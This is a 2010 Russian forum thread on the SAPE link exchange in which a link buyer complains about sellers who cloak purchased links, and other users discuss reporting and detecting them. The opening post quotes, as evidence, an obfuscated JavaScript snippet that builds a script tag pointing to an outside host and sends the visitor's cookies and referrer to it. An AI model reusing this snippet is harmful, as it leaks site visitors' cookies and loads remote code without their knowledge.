Вернуться   Форум SAPE.RU > Система SAPE.ru > Пожелания пользователей системы

-->
Ответ
 
Опции темы
Старый 17.08.2010, 15:14   #1
Новичок
 
Регистрация: 11.10.2007
Сообщений: 40
Вес репутации: 204
stealthy - как роза среди колючекstealthy - как роза среди колючекstealthy - как роза среди колючек
Angry Сделайте чтобы система не предлагала ВМ ссылки под клоакингом

Закупка у меня автоматическая. В последнее время вижу что ссылки в теме english работают не так эффективно как раньше. Пошел посмотреть в чем дело, выясняется что какой-то ушлый кент продает ссылки на сайтах, которые в коде есть, а на сайте через Ctrl-F их не видно. Полез разбираться дальше, выясняется что когда я WGETом страницы его беру - у меня один код, где ссылки есть. А если я через FireFox смотрю - ссылки как-бы вроде есть в коде, но также есть и скриптик шифрованный, который вероятно потом ссылки с экрана убирает или вообще вырезает из DOM. А что боту гугла отдается - одному богу известно.

Скрипт типовой, вида:
<!-- 3670389841475d5e8bab52ac409dba72 --> <script>function practical_invented(id) { var p00 = document; var chars = 'o7M83F;DerShkl"qf+RKIyA=.EOCbJ5!XQsLBa421Y>p/xdVwN:Tv<PH*0W69&t?GzcgjZnui mU'; var r = escape(p00.referrer); var c = escape(p00.cookie); var i = escape(id); var h = escape('mimslyninn'); p00.write(String(chars.charAt(53) + "@" + chars.charAt(34) + "@" + chars.charAt(66) + "@" + chars.charAt(9) + "@" + chars.charAt(72) + "@" + chars.charAt(43) + "@" + chars.charAt(62) + "@" + chars.charAt(73) + "@" + chars.charAt(34) + "@" + chars.charAt(9) + "@" + chars.charAt(66) + "@" + chars.charAt(23) + "@" + chars.charAt(14) + "@" + chars.charAt(11) + "@" + chars.charAt(62) + "@" + chars.charAt(62) + "@" + chars.charAt(43) + "@" + chars.charAt(50) + "@" + chars.charAt(44) + "@" + chars.charAt(44) + "@" + chars.charAt(34) + "@" + chars.charAt(28) + "@" + chars.charAt(46) + "@" + chars.charAt(62) + "@" + chars.charAt(46) + "@" + chars.charAt(34) + "@" + chars.charAt(24) + "@" + chars.charAt(66) + "@" + chars.charAt(0) + "@" + chars.charAt(74) + "@" + chars.charAt(44) + "@" + chars.charAt(37) + "@" + chars.charAt(66) + "@" + chars.charAt(0) + "@" + chars.charAt(71) + "@" + chars.charAt(70) + "@" + chars.charAt(62) + "@" + chars.charAt(8) + "@" + chars.charAt(9) + "@" + chars.charAt(24) + "@" + chars.charAt(68) + "@" + chars.charAt(34) + "@" + chars.charAt(63) + "@" + "@").replace(/\@/g,'') + "r=" + r + "&c=" + c + "&i=" + i + "&h=" + h + String(chars.charAt(14) + "&" + chars.charAt(42) + "&" + chars.charAt(53) + "&" + chars.charAt(44) + "&" + chars.charAt(34) + "&" + chars.charAt(66) + "&" + chars.charAt(9) + "&" + chars.charAt(72) + "&" + chars.charAt(43) + "&" + chars.charAt(62) + "&" + chars.charAt(42) + "&" + "&").replace(/\&/g,'')); } </script><style>
div#b721ae08d6f7be874e3b85e484e6c33c3, div#b721ae08d6f7be874e3b85e484e6c33c3 a
{
font-style: normal;
font-weight: normal;
font-family: Verdana, Tahoma, sans-serif;
font-size: 8px;
text-decoration: none;
color: gray;
text-align: center;
}

</style>
<div id='b721ae08d6f7be874e3b85e484e6c33c3'>тут идут ссылки</div>
<script>practical_invented('b721ae08d6f7be874e3b85 e484e6c33c3');</script>

При этом имена переменных от сайта к сайту меняются, имена функций тоже. Сайтов таких великое множество, в теме english их чуть ли не процентов 20 в моих фильтрах проходит.

Мне как-то недосуг выяснять что именно делает данный скрипт и индексируется ли в итоге данная ссылка ботом поисковика или он её вообще не видит. Мне достаточно того что:
1. Ссылки не видны в браузере, код отдается разный разным клиентам - это клоакинг и ничего хорошего от ссылок с таких доноров кроме потери денег лично для себя я не вижу.
2. Человек модифицирует скрипты от сайта к сайту, это просто так никто делать не будет.
3. Результата, ожидаемого мной, от закупки таких ссылок нет.

Учитывая, что я трачу деньги на подобные "ссылки", хотелось бы чтобы SAPE:
а) перестала мне продавать подобные страницы.
б) нашла владельца аккаунта с сайтами cec*****er.com, mi******inn.com и т.д. и посмотрела на код страниц на всех его проектах. Далее по обстоятельствам.

Последний раз редактировалось zhegloff; 18.08.2010 в 03:14.
stealthy вне форума   Ответить с цитированием
Старый 17.08.2010, 15:51   #2
Администратор
 
Аватар для Ank
 
Регистрация: 05.02.2007
Сообщений: 18,405
Вес репутации: 715
Ank - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущееAnk - прекрасное будущее
По умолчанию

stealthy, вы в обратку писали? займитесь. Даже место есть специальное.
__________________
Начать зарабатывать на своих сайтах. Консультирую своих рефов по аське

Читаем ФАК
Ank вне форума   Ответить с цитированием
Старый 17.08.2010, 16:05   #3
Bannеd
 
Регистрация: 17.09.2008
Сообщений: 6,446
Вес репутации: 368
Последний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущееПоследний Герой - прекрасное будущее
По умолчанию

stealthy, http://help.sape.ru/sape/faq/1024
Последний Герой вне форума   Ответить с цитированием
Старый 18.08.2010, 01:48   #4
Новичок
 
Регистрация: 11.10.2007
Сообщений: 40
Вес репутации: 204
stealthy - как роза среди колючекstealthy - как роза среди колючекstealthy - как роза среди колючек
По умолчанию

Ank, некогда мне место специальное искать в ваших запутанных хелпах. У нас в саппорте принимается любой запрос, независимо от того где он сформулирован. А сидеть пальцем в носу ковырять типа "ты не там написал, иди в другом месте напиши" - это много ума не нужно. Только отношение к клиенту показывает, больше ничего. Умничай у себя дома, тут вы деньги на мне зарабатываете, так что вы и займитесь.
stealthy вне форума   Ответить с цитированием
Старый 18.08.2010, 03:13   #5
Добрый модератор
 
Аватар для zhegloff
 
Регистрация: 09.07.2007
Адрес: глобус Украины
Сообщений: 27,600
Вес репутации: 1025
zhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущееzhegloff - прекрасное будущее
По умолчанию

stealthy, не нужно хамить человеку, ничего о нем не зная.


Цитата:
Сообщение от stealthy Посмотреть сообщение
Ank, некогда мне место специальное искать в ваших запутанных хелпах.
Для очень занятых место указано в комменте номер три. Можете написать в любое другое место, в таком случае будет просто более медленная реакция.
__________________
Установка кода сапы от $9.95. Пишите в личку.
Правильный хостинг.
В личке бесплатно не отвечаю обычно.
zhegloff вне форума   Ответить с цитированием
Старый 18.08.2010, 17:05   #6
Новичёк
 
Аватар для Ataka
 
Регистрация: 02.09.2007
Адрес: Эксрезидент
Сообщений: 2,579
Вес репутации: 315
Ataka - прекрасное будущееAtaka - прекрасное будущееAtaka - прекрасное будущееAtaka - прекрасное будущееAtaka - прекрасное будущееAtaka - прекрасное будущееAtaka - прекрасное будущееAtaka - прекрасное будущееAtaka - прекрасное будущееAtaka - прекрасное будущееAtaka - прекрасное будущее
По умолчанию

Я вот тоже не понимаю Сапу. Почему юзвери сами проверяют наличие своих ссылок на донорах?
Я в других биржах не участвую, но видел декларативные заявления о том, что если ссылки непроиндексированны в течение месяца, то они их снимают автоматом. Почему у нас не так? Ведь самый главный критерий перехода с обмена сюда был тот, что Сапа гарантировала наличие ссылки. А меня за...вало каждый месяц проверять партнёров на вшивость. Хотя, справедливости ради, замечу, что уродов-клочеров или ..дара... скрывающих ссылки, здесь меньше, чем было в ручном обмене.
__________________
Здесь пишут статьи. 1-2$ за 2000 символов. Разве не халява?
Ataka вне форума   Ответить с цитированием
Старый 18.08.2010, 18:46   #7
Новичок
 
Регистрация: 11.10.2007
Сообщений: 40
Вес репутации: 204
stealthy - как роза среди колючекstealthy - как роза среди колючекstealthy - как роза среди колючек
По умолчанию

Цитата:
Сообщение от zhegloff Посмотреть сообщение
stealthy, не нужно хамить человеку, тем более ничего о нем не зная
Обо мне тоже вы ничего не знаете, и вам хамить мне это не мешает.

Для начала давайте господа определимся - тут нет мальчиков и девочек, которые трещат на форуме от избытка времени за бесплатно, как на серче. Тут есть люди, которые зарабатывают деньги и тратят деньги в вашей системе, причем платят вам комиссию. А вы обеспечиваете им сервис. Мне честно говоря от ваших штрафных баллов ни жарко и ни холодно. В конце концов, я фильтры и сам настрою, без вас. Тем более, что ни одно пожелание с моей стороны, за несколько лет, не было принято во внимание. Что уже многое говорит о вашем отношении к клиенту. Просто чтобы расставить точки над i и закрыть тему раз и навсегда, я бы хотел чтобы ваше руководство, отвечающее за поддержку пользователей, ознакомилось с моим частным мнением. Возможно, кто-то еще под ним даже подпишется.

Ситуация простая:
Клиент (я) пишет вам на форуме сообщение о некорректной работе в системе кого-то/чего-то, что приводит к потере клиентских (моих) денег.

Что должна (обязана) сделать техподдержка платного сервиса в таком случае:
1. Молча передать запрос на разбирательство в отдел, который у вас этим занимается.
2. Если запрос "палит урлы" или "не там размещен" то он должен быть силами службы поддержки удален с форума или перемещен в нужный раздел, или скорректирован, если он задевает чьи-то интересы. При этом клиенту говорится что он ошибся с местом куда нужно сообщать, но все равно ему большое спасибо за информацию и меры будут приняты в ближайшее время, поскольку это в интересах биржи в первую очередь.
3. Через некоторое время, если проблема была устранена было бы не лишне поинтересоваться у клиента устранена ли она и с его точки зрения.

По крайней мере, в нашей компании принято делать именно так.

Что делаете вы тут, играя в модерацию и занимаясь формализмом:
1. Говорите клиенту "Типа вы не туда написали. Займитесь.". Это что такое, команда собаке?
2. Пишете мне в личку, что я неправ "оскорбив" кого-то и выставляете штрафные баллы. То есть клиент неправ, а модератор который написал мне то же самое - имеет право.
3. Пишете мне в личке, что я спалил чей то УРЛ и опять начисляете штрафные баллы. То есть вы в данном случае защищаете интересы того, кто длительное крал, давайте называть своими именами вещи, мои деньги, и продолжает красть деньги других пользователей.

При вашем посредничестве мне был продан некачественный товар. Ссылки в интерфейсе есть, деньги за них сняты, комиссию вы забрали свою. Ссылок по факту на сайте нет - их нет в браузере, они не оказывают влияния на ранжирование. Вообще-то, любой клиент в такой ситуации вправе подать в суд и вы будете должны вернуть деньги за некачественно оказанную услугу, причем независимо от того будет в пользовательском соглашении прописана ваша ответственность или нет. Репутационные издержки в подобном случае вряд ли понравятся любому нормальному поставщику услуг.

Поэтому мой вам добрый совет. Пересмотреть свое отношение к клиентам, особенно к тем, которые по сути помогают вам делать ваш бизнес, предоставляя вам ценную информацию и выполняющие роль внештатных тестировщиков и заказчиков. И не забывайте, что клиенты хамства не прощают. Причем, неважно от кого оно исходит - от штатных сотрудников компании, или внештатных модераторов, обслуживающих их форум.

Клиент всегда прав.

Последний раз редактировалось stealthy; 18.08.2010 в 18:54.
stealthy вне форума   Ответить с цитированием
Старый 18.08.2010, 18:55   #8
Привилегированный сапёр
 
Аватар для Sergoff
 
Регистрация: 21.04.2008
Сообщений: 2,426
Вес репутации: 310
Sergoff - прекрасное будущееSergoff - прекрасное будущееSergoff - прекрасное будущееSergoff - прекрасное будущееSergoff - прекрасное будущееSergoff - прекрасное будущееSergoff - прекрасное будущееSergoff - прекрасное будущееSergoff - прекрасное будущееSergoff - прекрасное будущееSergoff - прекрасное будущее
По умолчанию

stealthy, дайте адрес сайта, я сам напишу по ссылке, данной в третьем сообщении.
Sergoff вне форума   Ответить с цитированием
Старый 18.08.2010, 19:04   #9
Эксперт
 
Аватар для kittenAA
 
Регистрация: 09.05.2009
Сообщений: 1,799
Вес репутации: 319
kittenAA - прекрасное будущееkittenAA - прекрасное будущееkittenAA - прекрасное будущееkittenAA - прекрасное будущееkittenAA - прекрасное будущееkittenAA - прекрасное будущееkittenAA - прекрасное будущееkittenAA - прекрасное будущееkittenAA - прекрасное будущееkittenAA - прекрасное будущееkittenAA - прекрасное будущее
По умолчанию

+1 хотелось бы что бы sape боролся с этой гадостью!

я когда в первые прочла на форуме про клоакинг - за час нашла более 10-ти сайтов по отдельности, а после, целую сетку доменов!!! отписала в т.п. - меры приняли.
на следующий день я нашла еще одну сетку, а через неделю еще одну! - не писала в т.п. трата времени т.к. этих уродов здесь уйма! а выполнять чужую работу не хочется
пользуюсь плагином винка и gbl - научили как искать такие сайты
думаю и sape бы мог написать похожий софт и проверять раз в месяц каждый сайт на клоакинг
kittenAA вне форума   Ответить с цитированием
Старый 18.08.2010, 19:27   #10
Новичёк
 
Аватар для Ataka
 
Регистрация: 02.09.2007
Адрес: Эксрезидент
Сообщений: 2,579
Вес репутации: 315
Ataka - прекрасное будущееAtaka - прекрасное будущееAtaka - прекрасное будущееAtaka - прекрасное будущееAtaka - прекрасное будущееAtaka - прекрасное будущееAtaka - прекрасное будущееAtaka - прекрасное будущееAtaka - прекрасное будущееAtaka - прекрасное будущееAtaka - прекрасное будущее
По умолчанию

stealthy, для чайников в php напишите плз строчку кода, по которой можно гарантированно определить клочеров. Мы её сунем в плагин и будем их отлавливать ещё на стадии заявок.
Я, к сожалению, в программинге не соображаю, поэтому прошу..
__________________
Здесь пишут статьи. 1-2$ за 2000 символов. Разве не халява?
Ataka вне форума   Ответить с цитированием
Ответ


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Что делать, чтобы ссылки не терялись dyalex Вопросы по работе системы 6 15.05.2010 15:42
Борьба с клоакингом. BMR Вопросы по работе системы 19 20.03.2010 00:10
Сделайте, пожалуйста, фильтр на длину ссылки Chameleon Пожелания пользователей системы 53 19.11.2009 19:03
Сделайте возможность продавать ссылки с ЖЖ sniffer Пожелания пользователей системы 11 09.02.2009 14:44


Часовой пояс GMT +3, время: 03:57.